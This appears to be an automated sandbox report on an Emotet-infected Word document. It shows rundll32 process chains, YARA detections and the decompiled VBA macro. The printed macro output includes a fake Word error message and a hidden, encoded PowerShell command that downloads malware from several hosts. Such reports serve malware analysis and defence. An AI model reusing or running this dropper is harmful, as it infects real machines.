Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2101092569.00000000002C0000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2101004097.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2448 Parent PID: 2468

General

Start time:	00:09:47
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL
Imagebase:	0x400000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2102924374.0000000000660000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2102828167.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2102745390.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2844 Parent PID: 2448

General

Start time:	00:09:47
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1
Imagebase:	0x400000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2107894176.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2500 Parent PID: 2844

General

Start time:	00:09:49
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF
Imagebase:	0x400000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2108207451.0000000000170000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2108344528.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2108318970.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 3040 Parent PID: 2500

General

Start time:	00:09:50
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1
Imagebase:	0x400000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2338438182.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2338503796.0000000000280000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2338458694.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: A5ate73kc6cw5njy

Declaration

Line	Content
1	Attribute VB_Name = "A5ate73kc6cw5njy"
2	Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 78, Strings: 0, Number of lines: 3, Relevance: 118.503

APIs	Meta Information
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Array
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: LpCFBdE
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Target
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Split
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: XlUFJHR
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: BvPhx
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: E1eikun_vqz38wvur
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Content
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Sbgh3kd2dneltk
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Array
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: zHRlEdEP
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Target
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Split
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: rSrZBJJv
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: uldHRAc
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Array
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: bpMND
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Target
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Split
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: nvNjhAFA
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: ixJTYF
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Array
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: eGHABDHYI
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Target
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Split
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: DSEaFYQ
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: wJdJAI
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Array
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: eBzEFGPxh
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Target
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Split
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: sujuoHFCJ
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: UsjaB
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Mid
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Name
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Application
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Array
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: xfQswJFE
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Target
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Split
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: fEDGCAg
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: lhhIDAA
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Array
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: yNpnD
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Target
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Split
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: JjJbB
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: ifTgDoG
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Array
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: qtNpWFzCE
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Target
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Split
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: riWqFGJY
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: JaknVR
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: GetObject
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Array
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: KAAmsFJLa
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Target
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Split
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: sOfSqNO
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: NFoIZAgdj
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Mid
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Len
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Array
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: muQUuJD
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Target
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Split
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: urqwC
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: xBaZq
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Create
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Alvw54nlrq0k5fkzbc
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Y10e4jw1j3djjv0vy_
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Array
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: IKEyYJ
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Target
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: Split
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: HYqcb
Part of subcall function Swrnfbrhhv1hn8ci80@Gusca95luq_: dBZlAG

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	Swrnfbrhhv1hn8ci80	executed
11	End Sub

Module: Gusca95luq_

Declaration

Line	Content
1	Attribute VB_Name = "Gusca95luq_"

Executed Functions

Function Swrnfbrhhv1hn8ci80, APIs: 126, Strings: 38, Number of lines: 135, Relevance: 297.635

APIs	Meta Information
Array
LpCFBdE
Target
Split
XlUFJHR
BvPhx
E1eikun_vqz38wvur
Content
Sbgh3kd2dneltk
Array
zHRlEdEP
Target
Split
rSrZBJJv
uldHRAc
Array
bpMND
Target
Split
nvNjhAFA
ixJTYF
Array
eGHABDHYI
Target
Split
DSEaFYQ
wJdJAI
Array
eBzEFGPxh
Target
Split
sujuoHFCJ
UsjaB
Mid
Name
Application
Array
xfQswJFE
Target
Split
fEDGCAg
lhhIDAA
Array
yNpnD
Target
Split
JjJbB
ifTgDoG
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Array
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: jyxYAFLC
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Target
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Split
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: XpIXCDhMq
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: BJMbZuJRF
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Array
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: jzCVAIVG
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Target
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Split
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: WPKmFe
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: pNdoqWCxt
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Array
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: SzdUE
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Target
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Split
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: fsCkG
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: SVfwH
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Array
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: cyDODgZgJ
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Target
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Split
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: cpeHA
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: yPcgGA
Array
qtNpWFzCE
Target
Split
riWqFGJY
JaknVR
GetObject	GetObject("winmgmts:win32_process")
Array
KAAmsFJLa
Target
Split
sOfSqNO
NFoIZAgdj
Mid
Len	Len(" ns wu db ndns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db nd/ns wu db ndcns wu db nd ns wu db ndmns wu db nd^ns wu db ndsns wu db nd^ns wu db ndgns wu db nd ns wu db nd%ns wu db nduns wu db ndsns wu db ndens wu db ndrns wu db ndnns wu db ndans wu db ndmns wu db ndens wu db nd%ns wu db nd ns wu db nd/ns wu db ndvns wu db nd ns wu db ndWns wu db ndons wu db nd^ns wu db ndrns wu db nddns wu db nd ns wu db ndens wu db ndxns wu db ndpns wu db nd^ns wu db ndens wu db ndrns wu db ndins wu db ndens wu db ndnns wu db nd^ns wu db ndcns wu db ndens wu db nddns wu db nd ns wu db ndans wu db ndnns wu db nd ns wu db ndens wu db ndrns wu db nd^ns wu db ndrns wu db ndons wu db ndrns wu db nd ns wu db ndtns wu db ndrns wu db ndyns wu db ndins wu db nd^ns wu db ndnns wu db ndgns wu db nd ns wu db ndtns wu db ndons wu db nd ns wu db ndons wu db ndpns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db ndtns wu db ndhns wu db nd^ns wu db ndens wu db nd ns wu db ndfns wu db ndins wu db nd^ns wu db ndlns wu db ndens wu db nd.ns wu db nd ns wu db nd&ns wu db nd ns wu db ndpns wu db nd^ns wu db ndons wu db ndwns wu db ndens wu db nd^ns wu db ndrns wu db ndsns wu db nd^ns wu db ndhns wu db ndens wu db nd^ns wu db ndlns wu db ndlns wu db nd^ns wu db nd ns wu db nd-ns wu db ndwns wu db nd ns wu db ndhns wu db ndins wu db nd^ns wu db nddns wu db nddns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db nd-ns wu db nd^ns wu db ndens wu db nd^ns wu db ndnns wu db ndcns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd Uwns wu db ndBFns wu db ndAFns wu db ndQAns wu db ndIAns wu db ndAgns wu db ndACns wu db ndgAns wu db ndIgns wu db ndA1ns wu db ndACns wu db ndIAns wu db ndKwns wu db ndAins wu db ndAEns wu db ndYAns wu db ndVAns wu db ndBzns wu db ndAEns wu db ndcAns wu db ndIgns wu db ndApns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAgns wu db ndAFns wu db ndsAns wu db nddAns wu db ndBZns wu db ndAFns wu db ndAAns wu db ndRQns wu db ndBdns wu db ndACns wu db ndgAns wu db ndIgns wu db ndB7ns wu db ndADns wu db ndEAns wu db ndfQns wu db ndB7ns wu db ndADns wu db ndMAns wu db ndfQns wu db ndB7ns wu db ndADns wu db ndAAns wu db ndfQns wu db ndB7ns wu db ndADns wu db ndQAns wu db ndfQns wu db ndB7ns wu db ndADns wu db ndIAns wu db ndfQns wu db ndAins wu db ndACns wu db ndAAns wu db ndLQns wu db ndBGns wu db ndACns wu db ndAAns wu db ndJwns wu db ndBJns wu db ndAGns wu db nd8Ans wu db ndLgns wu db ndAnns wu db ndACns wu db ndwAns wu db ndJwns wu db ndBzns wu db ndAHns wu db ndkAns wu db ndJwns wu db ndAsns wu db ndACns wu db ndcAns wu db ndTwns wu db ndByns wu db ndAHns wu db ndkAns wu db ndJwns wu db ndAsns wu db ndACns wu db ndcAns wu db ndcwns wu db ndB0ns wu db ndAGns wu db ndUAns wu db ndbQns wu db ndAuns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAGns wu db ndQAns wu db ndSQns wu db ndByns wu db ndAGns wu db ndUAns wu db ndYwns wu db ndB0ns wu db ndACns wu db ndcAns wu db ndKQns wu db ndApns wu db ndACns wu db ndAAns wu db ndOwns wu db ndAgns wu db ndACns wu db ndAAns wu db ndJAns wu db ndBxns wu db ndAEns wu db ndUAns wu db ndMwns wu db ndBSns wu db ndADns wu db ndkAns wu db ndPQns wu db ndAgns wu db ndACns wu db ndAAns wu db ndWwns wu db ndBUns wu db ndAHns wu db ndkAns wu db ndUAns wu db ndBlns wu db ndAFns wu db nd0Ans wu db ndKAns wu db ndAins wu db ndAHns wu db ndsAns wu db ndMQns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndNQns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndNAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMgns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMwns wu db ndB9ns wu db ndACns wu db ndIAns wu db ndLQns wu db ndBmns wu db ndACns wu db ndcAns wu db ndWQns wu db ndAnns wu db ndACns wu db ndwAns wu db ndJwns wu db ndBTns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAFns wu db ndAAns wu db ndbwns wu db ndBpns wu db ndAEns wu db nd4Ans wu db nddAns wu d) -> 37668
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Array
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: jyxYAFLC
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Target
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Split
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: XpIXCDhMq
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: BJMbZuJRF
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Array
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: jzCVAIVG
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Target
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Split
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: WPKmFe
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: pNdoqWCxt
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Array
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: SzdUE
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Target
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Split
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: fsCkG
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: SVfwH
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Array
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: cyDODgZgJ
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Target
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: Split
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: cpeHA
Part of subcall function K2eqcmojfn8ix90d6@Gusca95luq_: yPcgGA
Array
muQUuJD
Target
Split
urqwC
xBaZq
Create	SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwA,,) -> 0
Alvw54nlrq0k5fkzbc
Y10e4jw1j3djjv0vy_
Array
IKEyYJ
Target
Split
HYqcb
dBZlAG

Strings	Decrypted Strings
"A"
","
"high,critic"
"A"
","
"high,critic"
"ns wu db ""ndpns wu db nd"
"ns wu db ndrons wu db ndns wu db ndc""ens wu db ndsns wu db ndsns wu db ndns wu db nd"
"A"
","
"high,critic"
"ns wu db nd:wns wu db ndns w""u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
"A"
","
"high,critic"
"wns wu db ndi""nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
"A"
","
"high,critic"
"ns wu db ndns wu db nd"
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"

Line	Instruction	Meta Information
2	Function Swrnfbrhhv1hn8ci80()
3	Goto IUHjJ	executed
4	Const LpCFBdE as String = "A"
5	Const BvPhx as String = ","
6	Const XlUFJHR as String = "high,critic"
7	Dim HIXwxDo as Range
7	Set HIXwxDo = Array((LpCFBdE), Target)	Array LpCFBdE Target
8	If HIXwxDo Is Nothing Then
9	Endif
10	Dim tCOXBDEPL() as String
10	tCOXBDEPL = Split(XlUFJHR, BvPhx)	Split XlUFJHR BvPhx
10	IUHjJ:
12	skuwd = E1eikun_vqz38wvur + A5ate73kc6cw5njy.Content + Sbgh3kd2dneltk	E1eikun_vqz38wvur Content Sbgh3kd2dneltk
15	Goto elqXMZ
16	Const zHRlEdEP as String = "A"
17	Const uldHRAc as String = ","
18	Const rSrZBJJv as String = "high,critic"
